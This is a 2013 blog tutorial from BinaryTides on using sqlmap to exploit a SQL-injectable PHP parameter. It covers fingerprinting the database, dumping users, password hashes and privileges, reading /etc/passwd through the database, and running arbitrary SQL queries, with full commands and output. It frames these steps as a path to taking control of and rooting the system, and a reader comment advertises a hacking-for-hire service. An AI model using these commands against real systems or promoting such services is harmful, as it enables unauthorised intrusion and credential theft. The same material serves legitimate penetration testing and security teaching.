BinaryTidesCoding, Software, Tech and Reviews

SKIP TO CONTENT
 HOME
 LINUX
 WINDOWS
 TECH
 CODING
 UBUNTU
 GENERAL
 Home
 >
 Security
 >
 How to hack remote database with sqlmap

How to hack remote database with sqlmap

By Silver Moon | April 15, 2013

2 Comments

In the previous post on sqlmap basics we learnt how to use sqlmap to hack a
vulnerable web application and fetch the list of databases, tables, columns and
data rows. In this post we shall see how to do some simple fingerprinting on the
remote database to find valuable information that can be used to assist in
further exploitation of a system.
So lets say we have a vulnerable url

http://localhost/weak.php?id=10

where the id parameter is not

escaped properly in the php code
and suffers sql injection
vulnerability. The commands to list
out the databases would be

$ python ./sqlmap.py -u
"http://localhost/weak.php?id=10" --dbs
Then use the -T --columns and the --dump options to list out the tables of a
database, columns of a table and data in a table and so on.

Fingerprinting the remote system and its database

To find out more information about the remote system database use the option
"-b". It will try to find the exact banner of the database server. Lets try it on a
mysql database.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b

.....

[11:19:51] [INFO] the back-end DBMS is MySQL

[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--
threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'

The output has the banner text which is "5.1.61". This is the mysql banner and
clearly shows the mysql version being used. Now you can search google for any
mysql vulnerabilities that might exist in this version of mysql.

The next command will fetch the list of users and roles.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges

--roles --threads=10

..........

database management system users [5]:

[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............

database management system users password hashes:

[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL

........

[*] %root% (administrator) [27]:

privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

Getting the current user, current database and hostname information

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db

--hostname --threads=10
........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database: 'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain
hostname: 'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA: False

So in the above output we have the current user, current database, the
hostname.

Reading a system file

On mysql if the database user has permission to the FILE operation, then it can
read files from the file system. It can read only those files that are publicly
readable or readable by the mysql user. Here is a quick example to read the
/etc/passwd file.

$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10

sqlmap will store the file in its directory on the local file system, so that it can
be read later.

Run arbitrary sql command

The sql-query option can be used to run arbitrary sql queries on the database.
 $ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"

...........

[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10

select now();: '2013-04-15 11:51:10'

The last line in the output is the sql query output which was run on the remote
database.

Conclusion

So with all the above information it gets easier to get further into the system
and eventually take control of it, if possible. Sqlmap does quite a massive task
by discovering the database, the data and details about the operating system.
But in most cases it might not able to fully provide control of the remote
system in the form of a shell.

Further techniques need to be employed to get greater control of the system

and eventually root. We shall be discussing those in upcoming tutorials.

Last Updated On : 15th April 2013

 Facebook

 Twitter

 Pinterest

Related Post

CATEGORY: SECURITYTAGS: HACKING, SQL INJECTION, SQLMAP

Email harvesting with metasploit | Sqlmap tutorial for beginners – Cracking linux password with
tutorial hacking with... john the ripper ̵...
Post navigation
Php reverse shell with netcatHack gmail password with social engineering toolkit (SET)
2 thoughts on “How to hack remote database with sqlmap”
1. Rodger
July 19, 2017 at 8:08 pm
Contact darkwebsolutions for any type of hacking /database services
they offer different services on different range of hacking issues and
also helps to retrieve accounts that have been taken by hackers .You wll be
grateful.. www dot darkwebsolutions dot co

Reply

2. Roy Paul
July 17, 2016 at 2:02 pm
thank you for this tutorial.

Reply

Leave a Reply
Your email address will not be published. Required fields are marked *
Comment

Name *

Email *

Website

Post Comment

SEARCH

Search for:
Search
 CONNECT WITH US

OTHER INTERESTING STUFF
 Using sqlmap with login forms
 Sqlmap tutorial for beginners – hacking with sql injection

 Hack wordpress blogs with plecost fingerprinting tool

 Install and run sqlmap on windows

 Use sqlmap with tor proxy

 What are web shells – Tutorial
This site, binarytides.com is a
participant in the Amazon
Services LLC Associates Program, an affiliate advertising program designed to
provide a means for sites to earn advertising fees by advertising and linking to
Amazon.com.
 About us
 Contact us
 Privacy Policy
 Terms of Service
Copyright © 2019 · BinaryTides